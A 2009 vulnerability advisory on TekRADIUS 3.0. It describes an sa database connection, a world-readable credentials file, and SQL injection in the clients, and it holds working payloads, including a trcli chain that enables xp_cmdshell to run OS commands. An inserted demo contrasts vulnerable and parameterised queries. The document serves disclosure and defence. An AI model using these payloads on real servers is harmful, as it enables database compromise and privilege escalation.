TekRADIUS Privilege Escalation

Posted Jul 6, 2009
Authored by Tim Brown | Site nth-dimension.org.uk

The TekRADIUS radius server for Windows suffers from a SQL injection vulnerability that allows for privilege escalation. Details provided.

tags | exploit, sql injection
systems | windows
SHA-256 | 04e03394380b7c464a8bd6dabc94060b07b1420c44f813a363aca9d1aa17f13d

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20090412)
Date: 12th April 2009
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: TekRADIUS 3.0 <http://www.tekradius.com/>
Vendor: Yasin KAPLAN <http://www.yasinkaplan.com/>
Risk: Medium

Summary

This advisory comes in 3 related parts:

1) By default, TekRADIUS connects to SQL Server as the sa (or equivalent)
account; this is to allow it to create its database.

2) The TekRADIUS database credentials are stored in obfuscated form, but
the file itself is accessible by any Windows user.

3) TekRADIUS comes with GUI and command line clients. These do not
sanitise all input satisfactorily. This can lead to SQL injection,
allowing compromise of the database server and privilege escalation at
the Windows level.

Technical Details

1) If TekRADIUS is left configured to use the sa (or equivalent)
account to access its database after initial creation, then any
failure to correctly sanitise input which results in SQL injection gives
an attacker sysadmin-level access to the database server. From there,
procedures such as xp_cmdshell run commands in the security context of the
SQL Server service account, which is how a database compromise becomes a
Windows one.

2) TekRADIUS stores the database credentials in C:\Program Files\TekRADIUS\TekRADIUS.ini.
As the cacls output below shows, this file is readable by any local Windows
user, including all members of the Users group:

C:\Program Files\TekRADIUS>cacls TekRADIUS.ini
C:\Program Files\TekRADIUS\TekRADIUS.ini BUILTIN\Users:R
BUILTIN\Power Users:C
BUILTIN\Administrators:F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\TERMINAL SERVER USER:C

This happens even when we change the default install option and
opt only to install TekRADIUS for the current Windows user, and appears to
be by design, as discussed later. Note that the credentials are obfuscated
with the intention of preventing direct database access. Obfuscation is not
encryption, however: the client has to reverse it using nothing the local user
lacks, so any user who can read the file can recover the credentials.

3) TekRADIUS is intended to be managed using either a GUI or command line
client. In both cases, non-privileged Windows users are only presented with
limited functionality designed to prevent certain changes being made.
However, this is not entirely successful due to insufficient input sanitisation,
which can lead to SQL injection.

When the GUI is opened by a non-privileged user, they are presented with a
window containing 3 tabs, one of which is the "Users" tab. Within this is a
"Browse Users" text box. Injecting the following string into this text box:

' union select system_user,@@version;--

results in a table being returned containing the results of the injected
query (here the database login the client is connected as and the SQL Server
version string), confirming that the text box value is concatenated into
the query unescaped.

Whilst the command line client correctly sanitises most input, in one case
it does not, and it is therefore possible to inject arbitrary SQL
into queries made to the database server. For example:

C:\Program Files\TekRADIUS>trcli -r "'; exec master.dbo.sp_configure 'show advanced options', 1; reconfigure; exec master.dbo.sp_configure 'xp_cmdshell', 1; reconfigure; exec master.dbo.xp_cmdshell 'ping www.nth-dimension.org.uk'--"

This injects the SQL necessary to re-enable xp_cmdshell (which is disabled by
default on SQL Server 2005) and execute "ping www.nth-dimension.org.uk". Note
that this is a stacked-query injection: the sp_configure and xp_cmdshell calls
run as separate statements after the one trcli intended, and enabling
xp_cmdshell needs the sysadmin rights that a connection as sa carries.
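The "Browse Users" case above, as an added example that is not part of the advisory or of TekRADIUS: a client function that concatenates the text-box value into its query, the same lookup rewritten as the parameterised query Nth Dimension suggested to the vendor, and both run against an in-memory SQLite stand-in for SQL Server. The table layout, column names, function names and sample rows are assumptions; sqlite_version() stands in for @@version, a string literal for system_user, and the payload drops the trailing ';' because the sqlite3 driver refuses stacked statements, which is exactly what the trcli xp_cmdshell chain relies on SQL Server's client libraries accepting.

```python
"""Added example: SQL injection in a 'Browse Users' style lookup and the
parameterised fix, run against an in-memory SQLite stand-in for SQL Server.
Not TekRADIUS code; schema, names and sample rows are assumptions."""
import sqlite3

# Constructed sample data standing in for the TekRADIUS Users table (assumed layout).
SAMPLE_USERS = [
    ("alice", "Users"),
    ("bob", "Users"),
    ("admin", "Administrators"),
]

# The advisory's GUI payload was:  ' union select system_user,@@version;--
# Adapted for the SQLite stand-in: sqlite_version() replaces @@version, a string
# literal replaces system_user, and the ';' is dropped because sqlite3.execute()
# refuses stacked statements (SQL Server clients run them, which is what the
# trcli xp_cmdshell chain depends on).
INJECTED_PAYLOAD = "' union select 'nobody', sqlite_version()--"


def make_db() -> sqlite3.Connection:
    """Build the stand-in database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserName TEXT, GroupName TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def browse_users_vulnerable(conn: sqlite3.Connection, prefix: str) -> list:
    """Concatenates the text-box value into the statement. A single quote in
    the value closes the string literal and everything after it is parsed as
    SQL; the two-column UNION lines up with the two columns the grid shows,
    and the trailing -- comments out the rest of the original statement."""
    sql = (
        "SELECT UserName, GroupName FROM Users "
        f"WHERE UserName LIKE '{prefix}%'"
    )
    return conn.execute(sql).fetchall()


def browse_users_safe(conn: sqlite3.Connection, prefix: str) -> list:
    """Parameterised form: the statement text is fixed and the value is bound
    separately, so quotes in it are data, never syntax. The wildcard is added
    to the parameter, not to the statement."""
    sql = "SELECT UserName, GroupName FROM Users WHERE UserName LIKE ?"
    return conn.execute(sql, (prefix + "%",)).fetchall()


def run_demo() -> dict:
    """Return what each variant yields for a normal prefix and for the payload."""
    conn = make_db()
    return {
        "vulnerable_normal": browse_users_vulnerable(conn, "a"),
        "vulnerable_injected": browse_users_vulnerable(conn, INJECTED_PAYLOAD),
        "safe_normal": browse_users_safe(conn, "a"),
        "safe_injected": browse_users_safe(conn, INJECTED_PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in run_demo().items():
        print(f"{name:20s} {rows}")
```

With the payload, the vulnerable variant returns a single row that did not come from the Users table (the literal and the engine version), while the parameterised variant returns nothing, because the whole payload is simply treated as a username prefix that matches no one.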

Solutions

Unfortunately, Nth Dimension are unaware of any fixes for these issues at the
current time. The vendor was contacted on the 13th April 2009 and immediately
responded. The vendor provided a private patch that partially resolved the
issue, and Nth Dimension gave feedback outlining further issues with SQL
injection into the GUI and suggesting parameterised queries. Nth Dimension
also made suggestions around the installation routine to resolve the file
permission issues. Nth Dimension are not aware that the patch or the
additional feedback has been included in the public product, and no further
emails have been received. We would recommend that read access to TekRADIUS.ini
is revoked for untrusted users, and that TekRADIUS is reconfigured to use
a non-privileged database account, limited to the TekRADIUS database, once
the initial database creation is complete.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
-----END PGP SIGNATURE-----